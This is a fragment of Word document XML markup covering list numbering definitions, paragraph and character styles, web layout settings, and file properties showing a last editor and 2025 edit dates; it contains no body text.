        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="minorEastAsia"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4C0673"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="44609BF6"/>
    <w:lvl w:ilvl="0" w:tplc="6DEA4206">
      <w:start w:val="3"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="minorEastAsia"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F082D02"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9B78C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C4205"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FD7ABCE0"/>
    <w:lvl w:ilvl="0" w:tplc="6DEA4206">
      <w:start w:val="3"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="minorEastAsia"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A3C4F6D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D5CA26E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D8E2D33"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="63B6B454"/>
    <w:lvl w:ilvl="0" w:tplc="0FEE93DC">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5A3310E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="514E985C"/>
    <w:lvl w:ilvl="0" w:tplc="6DEA4206">
      <w:start w:val="3"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="minorEastAsia"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E514208"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3784151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F3D1991"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F4421F48"/>
    <w:lvl w:ilvl="0" w:tplc="6DEA4206">
      <w:start w:val="3"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="minorEastAsia"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12B329F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="55203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346FF3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6EDC4826"/>
    <w:lvl w:ilvl="0" w:tplc="6DEA4206">
      <w:start w:val="3"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="minorEastAsia"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27B564D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="09FA313C"/>
    <w:lvl w:ilvl="0" w:tplc="6DEA4206">
      <w:start w:val="3"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="minorEastAsia"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416746B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C0B2EEB2"/>
    <w:lvl w:ilvl="0" w:tplc="1409000F">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304F82"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFBC8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1BC07F9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F67237CE"/>
    <w:lvl w:ilvl="0" w:tplc="0FEE9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A7695B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1FB0FBF6"/>
    <w:lvl w:ilvl="0" w:tplc="6DEA4206">
      <w:start w:val="3"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="minorEastAsia"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D045A86"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EA3A7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25543266">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="95835410">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1567569041">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="706373913">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="321542016">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1266042135">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="531842219">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1519388091">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1829593571">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="800541224">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="638464595">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1195465966">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1011567042">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="817959827">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1471630013">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1973708623">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="135614601">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="9283913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ABD"/>
    <w:rsid w:val="00072C48"/>
    <w:rsid w:val="000E19BF"/>
    <w:rsid w:val="00146C3F"/>
    <w:rsid w:val="001B69E9"/>
    <w:rsid w:val="00221F7C"/>
    <w:rsid w:val="0022306B"/>
    <w:rsid w:val="00242CE4"/>
    <w:rsid w:val="00263553"/>
    <w:rsid w:val="0036479D"/>
    <w:rsid w:val="003B694D"/>
    <w:rsid w:val="003C59FC"/>
    <w:rsid w:val="004B1325"/>
    <w:rsid w:val="004F5387"/>
    <w:rsid w:val="006131A3"/>
    <w:rsid w:val="006203E0"/>
    <w:rsid w:val="006379B2"/>
    <w:rsid w:val="00644BAF"/>
    <w:rsid w:val="00762D75"/>
    <w:rsid w:val="00773C52"/>
    <w:rsid w:val="007742B2"/>
    <w:rsid w:val="007C32C0"/>
    <w:rsid w:val="00864C0E"/>
    <w:rsid w:val="0089073C"/>
    <w:rsid w:val="009239B3"/>
    <w:rsid w:val="00995B9D"/>
    <w:rsid w:val="009A6ABD"/>
    <w:rsid w:val="009F3ECC"/>
    <w:rsid w:val="00A101E5"/>
    <w:rsid w:val="00A23AB3"/>
    <w:rsid w:val="00A5594D"/>
    <w:rsid w:val="00A90AF3"/>
    <w:rsid w:val="00AE5D56"/>
    <w:rsid w:val="00B168AC"/>
    <w:rsid w:val="00B24894"/>
    <w:rsid w:val="00C168DA"/>
    <w:rsid w:val="00C97FDF"/>
    <w:rsid w:val="00CB49D5"/>
    <w:rsid w:val="00CD3804"/>
    <w:rsid w:val="00CD7D1C"/>
    <w:rsid w:val="00D742AF"/>
    <w:rsid w:val="00D818DF"/>
    <w:rsid w:val="00D9392E"/>
    <w:rsid w:val="00DE2745"/>
    <w:rsid w:val="00E0344B"/>
    <w:rsid w:val="00E436A8"/>
    <w:rsid w:val="00E55CC7"/>
    <w:rsid w:val="00E627D3"/>
    <w:rsid w:val="00E672B9"/>
    <w:rsid w:val="00F467DB"/>
    <w:rsid w:val="00FD5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F543"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B93D6A14-2977-4399-9490-B3F56DC4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46C3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D"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000E19BF"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="000E19BF"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000E19BF"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="000E19BF"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007C32C0"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-NZ" w:eastAsia="en-NZ"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="007C32C0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="007C32C0"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00146C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09638">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="724960203">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1011881368">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1363440580">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1365399961">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1972205385">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="180"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1655987480">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="200630055">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1940718355">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1857187389">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1072846424">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="94139144">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="180"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="389043357">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="745106272">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2050371629">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1388072213">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="836768531">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1630358928">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="89086172">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="575825732">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="180"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1092360222">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1010911956">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1316760250">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1033648450">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="719788859">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="832523600">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="180"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="507521305">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="631207692">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1087506694">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1065252197">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1444691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0064-F986-4525-AE31-99555A16E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Nelson Pinder</cp:lastModifiedBy>
  <cp:revision>12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-06-15T01:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-13T00:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>